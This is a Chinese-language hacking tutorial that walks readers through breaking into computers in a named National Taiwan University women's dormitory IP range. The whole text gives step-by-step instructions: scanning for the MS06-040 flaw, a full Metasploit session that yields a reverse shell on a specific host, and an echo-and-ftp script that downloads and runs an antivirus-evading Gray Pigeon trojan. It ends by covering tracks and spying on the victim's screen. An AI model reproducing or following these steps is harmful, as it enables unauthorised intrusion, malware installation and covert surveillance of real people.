你想知道台湾大学女生的电脑里面都有些什么东西吗？你想知道台湾大学女生每天都用电脑做些什么吗？带着这些疑问我们就来入侵一台台湾大学女生的电脑来看看把。 好了，废话不多说了，开始行动把。 首先我们用纯真IP数据库来查找台湾大学女生宿舍的IP把。打开软件后选地址=》IP段。再在查询字段里面输”台湾大学”。点查询，就出来很多结果，如图1： 我们随便找一段IP，就找140.112.227.0—140.112.227.255把，台湾大学女七舍（法学院）的。法学院的，先”汗”一下，万一被发现我入侵她的电脑了不会找我打官司把，”怕怕”。好拉，说干就干，接下来我们就利用微软8月份发布的MS06_040漏洞来入侵把。好拉，题外话不说了，要利用这个漏洞首先当然是扫描，搬出我们的扫描软件rpc-server Scanner.exe。打开扫描软件后填上IP段140.112.227.1—140.112.227.255。扫描后结果如图2： 看到扫描结果这一行，一般显示Vulnerable这样的主机我们就可以用来溢出了。别告诉我你什么都扫不到，扫不到也是很正常的，因为现在好多地方的电信都对ADSL用户发出的数据包限制了。那你就只有用代理肉鸡或者改线程扫了，至于如何用搞代理肉鸡或者改线程我就不具体说了，自己去想办法把，这也不在本文范围之列。我们现在已经扫到140.112.227.104这台机了。接下来就溢出把。这里我们用到Metasploit这个工具了，Metasploit里面包含了很多溢出程序，当然里面也包含了ms06_040这个漏洞的溢出程序。安装Metasploit后我们在开始—程序里找到Metasploit framework，打开MSFConsole。打开后界面如下图3： 在msf >后输入“use netapi_ms06_040”，回车。再输入“set PAYLOAD win32_reverse”，回车。再输入“set RHOST IP”，回车，这里的IP填上你要溢出的主机IP，也就是140.112.227.104。再输入“set LHOST IP”，回车，这里的IP是当前使用的主机的IP。这里要用公网的IP，如果你在局域网内就要想办法把自己的主机映射出去。接下来输“set TARGET 0”，回车。全部完成后就输入“exploit”，回车。按回车键后就开始溢出了。当出现一下内容时说明你已经成功溢出得到一个sell了： msf > use netapi_ms06_040 msf netapi_ms06_040 > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf netapi_ms06_040(win32_reverse) > set RHOST 140.112.227.104 RHOST -> 140.112.227.104 msf netapi_ms06_040(win32_reverse) > set LHOST xxx.xxx.xxx.xxx LHOST -> xxx.xxx.xxx.xxx msf netapi_ms06_040(win32_reverse) > set TARGET 0 TARGET -> 0 msf netapi_ms06_040(win32_reverse) > exploit Starting Reverse Handler. Detected a Windows xp target This will not work on SP2！ Sending request... The server rejected it,trying again… Got connection from 140.112.227.104:4321 <-> xxx.xxx.xxx.xxx:1039 Microsoft Windows XP [乜 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 到了这里说明我们入侵已经成功了。接下来就看你自己想留什么样的后门了。如果是win2000服务器或win2003我们就可以直接克隆一个隐藏的管理员账号开个3389了。如果对方是winxp的系统就比较麻烦了，当你用3389连接时对方的屏幕会提示是否允许连接。那怎么办呢？我们可以上传个木马。我这里就用灰鸽子把。至于上传这里可能会难倒一些新手，没关系，我会告诉你一种好方法的。其实上传的方法有很多，比如用TFTP、写VBS脚本等等。我试用过很多方法，觉得对于外网主机来说最好用的还是写个txt文件，然后再用ftp执行上传。在这里你需要有个ftp空间，先把你的木马传到ftp空间上去。然后在命令行下执行echo命令写个txt文件。写txt文件的命令如下： echo open 你FTP主机的IP>>1.txt echo FTP的用户名>>1.txt echo FTP的密码>>1.txt echo bin>>1.txt echo get 木马的名字.exe>>1.txt echo bye>>1.txt 这些代码要一行一行的写，写完一行后回车。全部写完后我们再来看看是不是写进去了，输入”dir 1.txt”如图4所示，说明我们的txt写入成功。 由于台湾的操作系统是繁体中文的，而我的电脑又没安装繁体语言包，里面的繁体字全部显示乱码。1.txt成功写入后我们在执行”ftp ?s:1.txt”这个命令。稍等一下，出现图5所示，说明我们下载成功。 这里h.exe就是我做的自动上线的免杀灰鸽子服务端。上传成功后我们在输入h.exe运行。运行成功后我们还有一件重要的事要做，就是删除我们开始写入的1.txt。要不你的FTP账号就很会被别人看到了，执行”del 1.txt”。好拉，安全工作做完了我们就打开灰鸽子等待肉鸡上线把。呵呵，不过几秒钟我们的肉鸡就上线了。如图6： 接下来我们就屏幕监控，看看台湾大学的女学生们都在做些什么。如图7就是我屏幕监控后截的一张图 原来台湾的MM不用QQ，喜欢聊MSN。如果你想和台湾的MM亲密交流的话就加上她的MSN把。 其实除了MS06_040漏洞溢出以外，你还有很多方法可以拿到shell，这就要看你自己平时掌握的东西了。好拉，整个入侵的过程就结束了。